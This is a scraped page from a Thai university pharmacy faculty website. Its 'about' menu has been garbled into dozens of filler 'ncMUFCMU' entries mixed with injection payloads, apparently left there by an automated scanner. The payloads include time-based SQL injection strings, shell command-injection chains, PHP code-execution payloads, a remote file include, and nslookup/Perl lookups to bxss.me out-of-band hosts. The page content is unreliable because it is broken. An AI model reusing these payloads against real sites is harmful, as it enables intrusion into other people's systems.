ข่าวประชาสัมพันธ์

เกี่ยวกับคณะเภสัชศาสตร์

- ประวัติคณะเภสัชศาสตร์

- ปรัชญา วิสัยทัศน์ พันธกิจ วัตถุประสงค์

- อัตลักษณ์คณะเภสัชศาสตร์

- ปณิธานคณะเภสัชศาสตร์

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- response.write(9234973*9247628)

- '+response.write(9234973*9247628)+'

- "+response.write(9234973*9247628)+"

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

-

- ${9999496+10000118}

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- '.gethostbyname(lc('hiteh'.'fuwogivb48380.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(81).chr(97).chr(68).'

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- echo wqicnz$()\ lmypyt\nz^xyu||a #' &echo wqicnz$()\ lmypyt\nz^xyu||a #|" &echo wqicnz$()\ lmypyt\nz^xyu||a #

- ".gethostbyname(lc("hitkc"."nwtmqrhx2dd38.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(118).chr(85)."

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- &echo ggohfq$()\ glgyix\nz^xyu||a #' &echo ggohfq$()\ glgyix\nz^xyu||a #|" &echo ggohfq$()\ glgyix\nz^xyu||a #

- )

- |echo byperv$()\ okphmh\nz^xyu||a #' |echo byperv$()\ okphmh\nz^xyu||a #|" |echo byperv$()\ okphmh\nz^xyu||a #

- add_about.php

- http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

- ncMUFCMU

- (nslookup hitqsyugoxzfvb9e6b.bxss.me||perl -e "gethostbyname('hitqsyugoxzfvb9e6b.bxss.me')")

- add_about.php

- !(()&&!|*|*|

- ncMUFCMU

- $(nslookup hitfcjkzdirot6185d.bxss.me||perl -e "gethostbyname('hitfcjkzdirot6185d.bxss.me')")

- ^(#$!@#$)(()))******

- add_about.php/.

- &(nslookup hitjuqdddbfljf849e.bxss.me||perl -e "gethostbyname('hitjuqdddbfljf849e.bxss.me')")&'\"`0&(nslookup hitjuqdddbfljf849e.bxss.me||perl -e "gethostbyname('hitjuqdddbfljf849e.bxss.me')")&`'

- |(nslookup hitcveppwibucc7d3a.bxss.me||perl -e "gethostbyname('hitcveppwibucc7d3a.bxss.me')")

- 1some_inexistent_file_with_long_name.jpg

- ncMUFCMU

- `(nslookup hitqqanfurjgr82a33.bxss.me||perl -e "gethostbyname('hitqqanfurjgr82a33.bxss.me')")`

- ncMUFCMU

- Http://bxss.me/t/fit.txt

- http://bxss.me/t/fit.txt?.jpg

- bxss.me

- ncMUFCMU

- ncMUFCMU

- ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

- ncMUFCMU

- ';print(md5(31337));$a='

- ";print(md5(31337));$a="

- ${@print(md5(31337))}

- ${@print(md5(31337))}\

- '.print(md5(31337)).'

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- 5jZPEZk3

- -1 OR 2+275-275-1=0+0+0+1 --

- -1 OR 2+830-830-1=0+0+0+1

- -1' OR 2+412-412-1=0+0+0+1 --

- -1' OR 2+872-872-1=0+0+0+1 or 'TPxO3XSm'='

- -1" OR 2+674-674-1=0+0+0+1 --

- if(now()=sysdate(),sleep(15),0)

- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

- 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

- (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

- 1 waitfor delay '0:0:15' --

- 1pOdb7QZ'; waitfor delay '0:0:15' --

- x0jIOLHd' OR 168=(SELECT 168 FROM PG_SLEEP(15))--

- QTUEyBLO') OR 796=(SELECT 796 FROM PG_SLEEP(15))--

- CY79JyOE')) OR 90=(SELECT 90 FROM PG_SLEEP(15))--

- ncMUFCMU'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

- 1'"

- @@aotap

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- บุคลากรคณะเภสัชศาสตร์

Media

pharmacy.hcu.ac.th © Copyright 2016, All Rights Reserved Designed & developed by: Noppol Saechua